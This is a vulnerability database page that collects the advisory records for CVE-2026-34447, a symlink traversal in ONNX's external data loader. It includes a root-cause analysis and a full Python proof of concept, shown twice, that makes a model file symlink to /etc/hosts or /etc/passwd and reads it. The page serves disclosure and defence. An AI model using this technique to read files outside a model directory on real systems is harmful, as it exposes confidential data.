Vulnerability-Lookup

PYSEC-2026-104

Vulnerability from pysec - Published: 2026-04-01 18:16 - Updated: 2026-05-20 09:19

Details

Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is a symlink traversal vulnerability in external data loading allows reading files outside the model directory. This issue has been patched in version 1.21.0.

Severity

5.5 (Medium)


                  
                    CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Impacted products

Name	purl
onnx	pkg:pypi/onnx

Aliases

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "onnx",
        "purl": "pkg:pypi/onnx"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.21.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.1",
        "0.2",
        "0.2.1",
        "1.0.0",
        "1.0.1",
        "1.1.0",
        "1.1.1",
        "1.1.2",
        "1.10.0",
        "1.10.1",
        "1.10.2",
        "1.11.0",
        "1.12.0",
        "1.13.0",
        "1.13.1",
        "1.14.0",
        "1.14.1",
        "1.15.0",
        "1.16.0",
        "1.16.1",
        "1.16.2",
        "1.17.0",
        "1.18.0",
        "1.19.0",
        "1.19.1",
        "1.19.1rc1",
        "1.2.1",
        "1.2.2",
        "1.2.3",
        "1.20.0",
        "1.20.0rc1",
        "1.20.0rc2",
        "1.20.1",
        "1.20.1rc1",
        "1.21.0rc1",
        "1.21.0rc2",
        "1.21.0rc3",
        "1.21.0rc4",
        "1.3.0",
        "1.4.0",
        "1.4.1",
        "1.5.0",
        "1.6.0",
        "1.7.0",
        "1.8.0",
        "1.8.1",
        "1.9.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34447",
    "GHSA-p433-9wv8-28xj"
  ],
  "details": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is a symlink traversal vulnerability in external data loading allows reading files outside the model directory. This issue has been patched in version 1.21.0.",
  "id": "PYSEC-2026-104",
  "modified": "2026-05-20T09:19:09.984613Z",
  "published": "2026-04-01T18:16:30.810Z",
  "references": [
    {
      "type": "EVIDENCE",
      "url": "https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

CVE-2026-34447 (GCVE-0-2026-34447)

Vulnerability from cvelistv5 – Published: 2026-04-01 17:39 – Updated: 2026-04-01 19:14

Title

ONNX: External Data Symlink Traversal

Summary

Severity

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

CWE

CWE-61 - UNIX Symbolic Link (Symlink) Following
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Assigner

GitHub_M

References

1 reference

URL	Tags
https://github.com/onnx/onnx/security/advisories/…	x_refsource_CONFIRM

Impacted products

1 product

Vendor	Product	Version
onnx	onnx	Affected: < 1.21.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-34447",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-01T19:14:28.777731Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-01T19:14:38.114Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "onnx",
          "vendor": "onnx",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.21.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Open Neural Network Exchange (ONNX) is an open standard for machine learning interoperability. Prior to version 1.21.0, there is a symlink traversal vulnerability in external data loading allows reading files outside the model directory. This issue has been patched in version 1.21.0."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-61",
              "description": "CWE-61: UNIX Symbolic Link (Symlink) Following",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-22",
              "description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-01T17:39:38.129Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj"
        }
      ],
      "source": {
        "advisory": "GHSA-p433-9wv8-28xj",
        "discovery": "UNKNOWN"
      },
      "title": "ONNX: External Data Symlink Traversal"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-34447",
    "datePublished": "2026-04-01T17:39:38.129Z",
    "dateReserved": "2026-03-27T18:18:14.894Z",
    "dateUpdated": "2026-04-01T19:14:38.114Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

GHSA-P433-9WV8-28XJ

Vulnerability from github – Published: 2026-04-01 21:14 – Updated: 2026-04-01 21:14

Summary

ONNX: External Data Symlink Traversal

Details

Summary - Issue: Symlink traversal in external data loading allows reading files outside the model directory. - Affected code: onnx/onnx/checker.cc: resolve_external_data_location used via Python onnx.external_data_helper.load_external_data_for_model. - Impact: Arbitrary file read (confidentiality breach) when a model’s external data path resolves to a symlink targeting a file outside the model directory.

Root Cause - The function resolve_external_data_location(base_dir, location, tensor_name) intends to ensure that external data files reside within base_dir. It: - Rejects empty/absolute paths - Normalizes the relative path and rejects .. - Builds data_path = base_dir / relative_path - Checks exists(data_path) and is_regular_file(data_path) - However, std::filesystem::is_regular_file(path) follows symlinks to their targets. A symlink placed inside base_dir that points to a file outside base_dir will pass the checks and be returned. The Python loader then opens the path and reads the target file.

Code Reference - File: onnx/onnx/checker.cc:970-1060 - Key logic: - Normalization: auto relative_path = file_path.lexically_normal().make_preferred(); - Existence: std::filesystem::exists(data_path) - Regular file check: std::filesystem::is_regular_file(data_path) - Returned path is later opened in Python: external_data_helper.load_external_data_for_tensor.

Proof of Concept (PoC) - File: onnx_external_data_symlink_traversal_poc.py - Behavior: Creates a model with an external tensor pointing to tensor.bin. In the model directory, creates tensor.bin as a symlink to /etc/hosts (or similar). Calls load_external_data_for_model(model, base_dir). Confirms that tensor.raw_data contains content from the target outside the model directory. - Run: - python3 onnx_external_data_symlink_traversal_poc.py - Expected: [!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dir

onnx_external_data_symlink_traversal_poc.py

#!/usr/bin/env python3
"""
ONNX External Data Symlink Traversal PoC

Finding: load_external_data_for_model() (via c_checker._resolve_external_data_location)
does not reject symlinks. A relative location that is a symlink inside the
model directory can target a file outside the directory and will be read.

Impact: Arbitrary file read outside model_dir when external data files are
obtained from attacker-controlled archives (zip/tar) that create symlinks.

This PoC:
 - Creates a model with a tensor using external_data location 'tensor.bin'
 - Creates 'tensor.bin' as a symlink to a system file (e.g., /etc/hosts)
 - Calls load_external_data_for_model(model, base_dir)
 - Confirms that tensor.raw_data contains the content of the outside file

Safe: only reads a benign system file if present.
"""

import os
import sys
import tempfile
import pathlib

# Ensure we import installed onnx, not the local cloned package
_here = os.path.dirname(os.path.abspath(__file__))
if _here in sys.path:
    sys.path.remove(_here)

import onnx
from onnx import helper, TensorProto
from onnx.external_data_helper import (
    set_external_data,
    load_external_data_for_model,
)


def pick_target_file():
    candidates = ["/etc/hosts", "/etc/passwd", "/System/Library/CoreServices/SystemVersion.plist"]
    for p in candidates:
        if os.path.exists(p) and os.path.isfile(p):
            return p
    raise RuntimeError("No suitable readable system file found for this PoC")


def build_model_with_external(location: str):
    # A 1D tensor; data will be filled from external file
    tensor = helper.make_tensor(
        name="X_ext",
        data_type=TensorProto.UINT8,
        dims=[0],  # dims will be inferred after raw_data is read
        vals=[],
    )
    # add dummy raw_data then set_external_data to mark as external
    tensor.raw_data = b"dummy"
    set_external_data(tensor, location=location)

    # Minimal graph that just feeds the initializer as Constant
    const_node = helper.make_node("Constant", inputs=[], outputs=["out"], value=tensor)
    graph = helper.make_graph([const_node], "g", inputs=[], outputs=[helper.make_tensor_value_info("out", TensorProto.UINT8, None)])
    model = helper.make_model(graph)
    return model


def main():
    base = tempfile.mkdtemp(prefix="onnx_symlink_poc_")
    model_dir = base
    link_name = os.path.join(model_dir, "tensor.bin")

    target = pick_target_file()
    print(f"[*] Using target file: {target}")

    # Create symlink in model_dir pointing outside
    try:
        pathlib.Path(link_name).symlink_to(target)
    except OSError as e:
        print(f"[!] Failed to create symlink: {e}")
        print("    This PoC needs symlink capability.")
        return 1

    # Build model referencing the relative location 'tensor.bin'
    model = build_model_with_external(location="tensor.bin")

    # Use in-memory model; explicitly load external data from base_dir
    loaded = model
    print("[*] Loading external data into in-memory model...")
    try:
        load_external_data_for_model(loaded, base_dir=model_dir)
    except Exception as e:
        print(f"[!] load_external_data_for_model raised: {e}")
        return 1

    # Validate that raw_data came from outside file by checking a prefix
    raw = None
    # Search initializers
    for t in loaded.graph.initializer:
        if t.name == "X_ext" and t.HasField("raw_data"):
            raw = t.raw_data
            break
    # Search constant attributes if not found
    if raw is None:
        for node in loaded.graph.node:
            for attr in node.attribute:
                if attr.HasField("t") and attr.t.name == "X_ext" and attr.t.HasField("raw_data"):
                    raw = attr.t.raw_data
                    break
            if raw is not None:
                break
    if raw is None:
        print("[?] Did not find raw_data on tensor; PoC inconclusive")
        return 2

    with open(target, "rb") as f:
        target_prefix = f.read(32)
    if raw.startswith(target_prefix):
        print("[!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dir")
        print(f"      Symlink {link_name} -> {target}")
        return 0
    else:
        print("[?] Raw data did not match target prefix; environment-specific behavior")
        return 3


if __name__ == "__main__":
    sys.exit(main())

Severity

5.5 (Medium)


                  
                    CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "onnx"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.21.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-34447"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22",
      "CWE-61"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-01T21:14:00Z",
    "nvd_published_at": "2026-04-01T18:16:30Z",
    "severity": "MODERATE"
  },
  "details": "Summary\n- Issue: Symlink traversal in external data loading allows reading files outside the model directory.\n- Affected code: `onnx/onnx/checker.cc: resolve_external_data_location` used via Python `onnx.external_data_helper.load_external_data_for_model`.\n- Impact: Arbitrary file read (confidentiality breach) when a model\u2019s external data path resolves to a symlink targeting a file outside the model directory.\n\nRoot Cause\n- The function `resolve_external_data_location(base_dir, location, tensor_name)` intends to ensure that external data files reside within `base_dir`. It:\n  - Rejects empty/absolute paths\n  - Normalizes the relative path and rejects `..`\n  - Builds `data_path = base_dir / relative_path`\n  - Checks `exists(data_path)` and `is_regular_file(data_path)`\n- However, `std::filesystem::is_regular_file(path)` follows symlinks to their targets. A symlink placed inside `base_dir` that points to a file outside `base_dir` will pass the checks and be returned. The Python loader then opens the path and reads the target file.\n\nCode Reference\n- File: onnx/onnx/checker.cc:970-1060\n- Key logic:\n  - Normalization: `auto relative_path = file_path.lexically_normal().make_preferred();`\n  - Existence: `std::filesystem::exists(data_path)`\n  - Regular file check: `std::filesystem::is_regular_file(data_path)`\n  - Returned path is later opened in Python: `external_data_helper.load_external_data_for_tensor`.\n\nProof of Concept (PoC)\n- File: `onnx_external_data_symlink_traversal_poc.py`\n- Behavior: Creates a model with an external tensor pointing to `tensor.bin`. In the model directory, creates `tensor.bin` as a symlink to `/etc/hosts` (or similar). Calls `load_external_data_for_model(model, base_dir)`. Confirms that `tensor.raw_data` contains content from the target outside the model directory.\n- Run:\n  - `python3 onnx_external_data_symlink_traversal_poc.py`\n  - Expected: `[!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dir`\n\nonnx_external_data_symlink_traversal_poc.py\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nONNX External Data Symlink Traversal PoC\n\nFinding: load_external_data_for_model() (via c_checker._resolve_external_data_location)\ndoes not reject symlinks. A relative location that is a symlink inside the\nmodel directory can target a file outside the directory and will be read.\n\nImpact: Arbitrary file read outside model_dir when external data files are\nobtained from attacker-controlled archives (zip/tar) that create symlinks.\n\nThis PoC:\n - Creates a model with a tensor using external_data location \u0027tensor.bin\u0027\n - Creates \u0027tensor.bin\u0027 as a symlink to a system file (e.g., /etc/hosts)\n - Calls load_external_data_for_model(model, base_dir)\n - Confirms that tensor.raw_data contains the content of the outside file\n\nSafe: only reads a benign system file if present.\n\"\"\"\n\nimport os\nimport sys\nimport tempfile\nimport pathlib\n\n# Ensure we import installed onnx, not the local cloned package\n_here = os.path.dirname(os.path.abspath(__file__))\nif _here in sys.path:\n    sys.path.remove(_here)\n\nimport onnx\nfrom onnx import helper, TensorProto\nfrom onnx.external_data_helper import (\n    set_external_data,\n    load_external_data_for_model,\n)\n\n\ndef pick_target_file():\n    candidates = [\"/etc/hosts\", \"/etc/passwd\", \"/System/Library/CoreServices/SystemVersion.plist\"]\n    for p in candidates:\n        if os.path.exists(p) and os.path.isfile(p):\n            return p\n    raise RuntimeError(\"No suitable readable system file found for this PoC\")\n\n\ndef build_model_with_external(location: str):\n    # A 1D tensor; data will be filled from external file\n    tensor = helper.make_tensor(\n        name=\"X_ext\",\n        data_type=TensorProto.UINT8,\n        dims=[0],  # dims will be inferred after raw_data is read\n        vals=[],\n    )\n    # add dummy raw_data then set_external_data to mark as external\n    tensor.raw_data = b\"dummy\"\n    set_external_data(tensor, location=location)\n\n    # Minimal graph that just feeds the initializer as Constant\n    const_node = helper.make_node(\"Constant\", inputs=[], outputs=[\"out\"], value=tensor)\n    graph = helper.make_graph([const_node], \"g\", inputs=[], outputs=[helper.make_tensor_value_info(\"out\", TensorProto.UINT8, None)])\n    model = helper.make_model(graph)\n    return model\n\n\ndef main():\n    base = tempfile.mkdtemp(prefix=\"onnx_symlink_poc_\")\n    model_dir = base\n    link_name = os.path.join(model_dir, \"tensor.bin\")\n\n    target = pick_target_file()\n    print(f\"[*] Using target file: {target}\")\n\n    # Create symlink in model_dir pointing outside\n    try:\n        pathlib.Path(link_name).symlink_to(target)\n    except OSError as e:\n        print(f\"[!] Failed to create symlink: {e}\")\n        print(\"    This PoC needs symlink capability.\")\n        return 1\n\n    # Build model referencing the relative location \u0027tensor.bin\u0027\n    model = build_model_with_external(location=\"tensor.bin\")\n\n    # Use in-memory model; explicitly load external data from base_dir\n    loaded = model\n    print(\"[*] Loading external data into in-memory model...\")\n    try:\n        load_external_data_for_model(loaded, base_dir=model_dir)\n    except Exception as e:\n        print(f\"[!] load_external_data_for_model raised: {e}\")\n        return 1\n\n    # Validate that raw_data came from outside file by checking a prefix\n    raw = None\n    # Search initializers\n    for t in loaded.graph.initializer:\n        if t.name == \"X_ext\" and t.HasField(\"raw_data\"):\n            raw = t.raw_data\n            break\n    # Search constant attributes if not found\n    if raw is None:\n        for node in loaded.graph.node:\n            for attr in node.attribute:\n                if attr.HasField(\"t\") and attr.t.name == \"X_ext\" and attr.t.HasField(\"raw_data\"):\n                    raw = attr.t.raw_data\n                    break\n            if raw is not None:\n                break\n    if raw is None:\n        print(\"[?] Did not find raw_data on tensor; PoC inconclusive\")\n        return 2\n\n    with open(target, \"rb\") as f:\n        target_prefix = f.read(32)\n    if raw.startswith(target_prefix):\n        print(\"[!!!] VULNERABILITY CONFIRMED: external_data symlink escaped base_dir\")\n        print(f\"      Symlink {link_name} -\u003e {target}\")\n        return 0\n    else:\n        print(\"[?] Raw data did not match target prefix; environment-specific behavior\")\n        return 3\n\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n\n```",
  "id": "GHSA-p433-9wv8-28xj",
  "modified": "2026-04-01T21:14:00Z",
  "published": "2026-04-01T21:14:00Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/onnx/onnx/security/advisories/GHSA-p433-9wv8-28xj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34447"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/onnx/onnx"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ONNX: External Data Symlink Traversal"
}

Sightings

Author	Source	Type	Date	Other

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

PYSEC-2026-104

CVE-2026-34447 (GCVE-0-2026-34447)

GHSA-P433-9WV8-28XJ

Tags

Sightings

Nomenclature